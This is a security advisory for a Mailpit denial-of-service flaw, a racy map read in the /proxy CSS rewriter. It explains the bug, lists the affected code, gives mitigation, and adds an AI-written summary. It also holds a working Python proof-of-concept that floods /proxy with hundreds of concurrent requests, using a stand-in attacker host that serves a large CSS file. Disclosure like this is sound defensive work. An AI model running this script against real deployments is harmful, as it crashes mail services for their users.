Mailpit: Concurrent map read & write in proxy CSS rewriter - remote unauth crash (fatal error: concurrent map read and map write)
Description
Summary
The screenshot/print proxy (/proxy?data=…) maintains a package-level assets map[string]MessageAssets cache, but reads the map without holding assetsMutex while a long-running cleanup goroutine and (re-entrant) CSS-rewriting code path concurrently write to it under the lock. When the unsynchronized read coincides with a synchronized write, Go's runtime raises fatal error: concurrent map read and map write — a runtime.throw that is not recoverable by http.Server's handler-panic recover. The whole Mailpit process exits, taking the SMTP, POP3 and HTTP listeners down with it.
Details
A remote, unauthenticated attacker who can (1) reach /proxy and (2) plant any message with a stylesheet link in the inbox can crash Mailpit by issuing concurrent /proxy?data=… requests against the same message's CSS URL. Mailpit's defaults make both prerequisites trivial: the SMTP listener accepts mail anonymously, the HTTP listener accepts requests anonymously, and the cleanup goroutine fires every minute regardless of whether the map is being read.
Affected code server/handlers/proxy.go:198-229 server/handlers/proxy.go:52-66 server/handlers/proxy.go:244-313
Go's map runtime sets a hashWriting flag at the start of any write op. Concurrent map reads check the flag and call throw("concurrent map read and map write") — throw is not caught by defer recover and is not caught by http.Server's handler-panic guard. The process exits with a stack trace.
### PoC 1. Deposit any message with a in the store (SMTP or /api/v1/send, both unauthenticated by default). 2. Make a few hundred concurrent requests to /proxy?data=base64(:https://attacker.example/big.css) — the attacker's big.css should be ~50 MiB and contain thousands of url(...) entries so each request spends time iterating the rewriter loop and touching assets[id] repeatedly.
Skeleton (set --allow-internal-http-requests only if you're testing locally — internal IPs are blocked by safeDialContext in production, which is correct):
# proxy-race.py
import socket, threading, base64, sys
ID = sys.argv[1] # 22-char shortuuid
CSS = "https://attacker.example/big.css"
TOKEN = base64.b64encode(f"{ID}:{CSS}".encode()).decode()
req = (
f"GET /proxy?data={TOKEN} HTTP/1.1\r\n"
f"Host: target:8025\r\n"
f"Connection: close\r\n\r\n"
).encode()
def hit():
try:
s = socket.create_connection(("target", 8025), timeout=10)
s.sendall(req)
while s.recv(8192): pass
s.close()
except Exception: pass
for _ in range(50): # 50 rounds
ts = [threading.Thread(target=hit) for _ in range(300)]
for t in ts: t.start()
for t in ts: t.join()
When the unlocked read at line 216 happens during a delete() from the cleanup goroutine, or during another goroutine's assets[id] = result write, Go's runtime emits:
fatal error: concurrent map read and map write
goroutine 123 [running]:
runtime.throw(...)
github.com/axllent/mailpit/server/handlers.ProxyHandler(...)
server/handlers/proxy.go:216
...
…and the process exits. Building Mailpit with go build -race produces a deterministic WARNING: DATA RACE trace at the same line under the same workload, confirming the access pattern is racy even without timing-based crash demonstration.
Impact
Unauthenticated remote attacker can trigger a concurrent map access crash in /proxy, causing a fatal runtime panic and full Mailpit process termination (DoS).
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A concurrent map read/write in Mailpit's proxy CSS rewriter lets an unauthenticated attacker crash the entire process by sending concurrent requests.
Vulnerability
The screenshot/print proxy (/proxy?data=…) in Mailpit maintains a package-level assets map[string]MessageAssets cache but reads the map without holding the assetsMutex. A long-running cleanup goroutine and a re-entrant CSS-rewriting code path concurrently write to the map under the lock. When an unsynchronized read coincides with a synchronized write, Go's runtime raises a fatal error (fatal error: concurrent map read and map write) that cannot be recovered by http.Server's handler-panic guard, and the entire Mailpit process exits [1], [2], [3]. Affected versions are prior to v1.30.0 [4].
Exploitation
An unauthenticated remote attacker who can reach /proxy and plant a message with a ` in the inbox can crash Mailpit. The attacker first sends a message containing a stylesheet link to a large attacker-controlled CSS file (e.g., ~50 MiB with many url(...) entries) via the SMTP listener or /api/v1/send endpoint, both of which are unauthenticated by default. Then, the attacker issues hundreds of concurrent /proxy?data=... requests against that same message's CSS URL. The CSS rewriter iterates the large file and repeatedly touches assets[id]`, causing concurrent writes under the lock, while the cleanup goroutine also writes to the map under the lock, and the unsynchronized read in the handler triggers the fatal race [1], [2], [3].
Impact
A successful attack causes the Mailpit process to exit with a fatal Go runtime error, taking down the SMTP, POP3, and HTTP listeners. This results in a complete denial of service (DoS) of the email testing tool. No authentication is required, and the attack can be executed remotely if the /proxy endpoint is reachable [1], [2], [3].
Mitigation
The vulnerability is fixed in Mailpit release v1.30.0 [4]. All users running versions prior to v1.30.0 should upgrade immediately. The fix introduces proper synchronization when reading the assets map. No known workaround exists beyond upgrading. Upgrading is strongly recommended as this release also includes other security fixes [4].
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3News mentions
0No linked articles in our index yet.